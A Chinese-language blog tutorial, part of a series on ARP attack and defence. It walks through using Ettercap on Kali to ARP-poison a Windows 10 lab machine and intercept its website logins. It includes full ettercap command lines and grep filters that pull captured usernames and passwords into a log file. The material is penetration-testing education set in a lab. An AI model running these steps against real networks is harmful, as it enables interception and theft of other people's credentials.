ARP渗透与攻防(五)之Ettercap劫持用户流量

ARP-Ettercap劫持用户流量

系列文章

ARP渗透与攻防(一)之ARP原理
ARP渗透与攻防(二)之断网攻击
ARP渗透与攻防(三)之流量分析
ARP渗透与攻防(四)之WireShark截获用户数据

一.ettercap 工具介绍

项目官网:http://ettercap.github.io/ettercap/index.html

EtterCap是一个基于ARP地址欺骗方式的网络嗅探工具,主要适用于交换局域网络。借助于EtterCap嗅探软件,渗透测试人员可以检测网络内明文数据通讯的安全性,及时采取措施,避免敏感的用户名/密码等数据以明文的方式进行传输。

ettercap几乎是每个渗透测试人员必备的工具之一。

二.ARP截获用户信息攻击步骤

环境准备

kali 作为ARP攻击机,IP地址:192.168.110.12

win10 作为被攻击方,IP地址:192.168.110.11

网关(路由器),IP地址:192.168.110.1

1.启动ettercap

ettercap -G

ARP渗透与攻防(五)之Ettercap劫持用户流量_第1张图片

2.点击右上角的对勾开始扫描

ARP渗透与攻防(五)之Ettercap劫持用户流量_第2张图片

3.点击左上角查看主机列表

ARP渗透与攻防(五)之Ettercap劫持用户流量_第3张图片

4.选择网关 点击底部的 Add to Target 1

ARP渗透与攻防(五)之Ettercap劫持用户流量_第4张图片

5.选择被攻击的靶机加入到target2

ARP渗透与攻防(五)之Ettercap劫持用户流量_第5张图片

6.点击右上角攻击菜单,选择ARP攻击

ARP渗透与攻防(五)之Ettercap劫持用户流量_第6张图片

7.点击ok发起攻击

ARP渗透与攻防(五)之Ettercap劫持用户流量_第7张图片

8.查看此时靶机的arp列表

arp -a| findstr 192.168.110.1

ARP渗透与攻防(五)之Ettercap劫持用户流量_第8张图片

8.查看kali的mac地址

ip a

ARP渗透与攻防(五)之Ettercap劫持用户流量_第9张图片
可以看到现在靶机上arp表里的网关的MAC地址已经被替换为了kali的MAC地址,我们的靶机已经被毒化了。

10.靶机登录网站

ARP渗透与攻防(五)之Ettercap劫持用户流量_第10张图片

11.kali截获用户流量,获取账号密码

ARP渗透与攻防(五)之Ettercap劫持用户流量_第11张图片

12.停止攻击

ARP渗透与攻防(五)之Ettercap劫持用户流量_第12张图片

三.Ettercap 软件功能介绍

1.启动界面

ARP渗透与攻防(五)之Ettercap劫持用户流量_第13张图片

Sniffing at startup :开启嗅探模式

Primary interface :选择网卡

Bridged sniffing :是否开启桥接模式

Bridged interface :桥接模式下的网卡

配置完成后,我们点上方的✔即可完成配置。

ARP渗透与攻防(五)之Ettercap劫持用户流量_第14张图片

2.中间人攻击菜单

ARP渗透与攻防(五)之Ettercap劫持用户流量_第15张图片

ARP poisoning :ARP攻击

DNP poisoning :DNP攻击

ICMP redirect :icmp重定向

Port stealing :端口欺骗

DHCP spoofing :DHCP欺骗

stop MITM :停止攻击

SSL intercept :ssl嗅探

3.更多选项

ARP渗透与攻防(五)之Ettercap劫持用户流量_第16张图片

Targets:攻击列表

Hosts:显示主机列表

Filters:载入二进制脚本

Plugins:插件

Logging:日志

4.hosts选项

ARP渗透与攻防(五)之Ettercap劫持用户流量_第17张图片

Hosts list:扫描到的主机列表

Enable ipv6 scan:扫描ipv6地址

Scan for hosts:扫描主机列表

load hosts form file:从外部文件载入主机列表

Save hosts to file:保存主机列表到文件

5.Targets选项

ARP渗透与攻防(五)之Ettercap劫持用户流量_第18张图片

Current targets:正在攻击的列表

Select targets::选择攻击列表

Portocol:攻击协议

Reverse matching:匹配规则

Wipe targets:擦除攻击

6.View选项

ARP渗透与攻防(五)之Ettercap劫持用户流量_第19张图片

Connections:连接信息

Profiles:IP地址信息

Statistics:统计信息

四.命令行运行Ettercap

1.运行命令讲解

ettercap –i –eth0 –Tq –M arp:remote/ip(host)//net gatemask/ >>b.txt
T:指的是text文本模式
q:指的是安静模式执行这个命令
i:后面跟的是连接局域网的网卡
M:后面跟的是指定使用arp的方式
>>:输出文件

2.攻击命令

ettercap -Tq -i eth0  -M arp:remote /192.168.110.1// /192.168.110.11// >>b.txt

在这里插入图片描述

3.靶机登录后台网站

ARP渗透与攻防(五)之Ettercap劫持用户流量_第20张图片

4.查看攻击界面日志

cat b.txt

在这里插入图片描述ARP渗透与攻防(五)之Ettercap劫持用户流量_第21张图片

5.过滤无用信息,只查看用户的登录信息

tail -f b.txt | grep "USER" 
或者
tail -f b.txt | grep "CONTENT" 
或者
tail -f b.txt | egrep "USER|CONTENT"

在这里插入图片描述
在这里插入图片描述
ARP渗透与攻防(五)之Ettercap劫持用户流量_第22张图片

6.停止ARP攻击

CTRL+C

7.分析日志

cat b.txt

8.筛选用户的登录信息

cat b.txt | grep "USER" 
或者
cat b.txt | grep "CONTENT" 
或者
cat b.txt | egrep "USER|CONTENT"

9.收集保存用户信息文件

cat -n  b.txt | egrep "USER|CONTENT" >arp.log
-n:添加行号
egrep:过滤规则
>:输出文件

你可能感兴趣的:(ARP渗透与攻防,网络,网络安全,安全)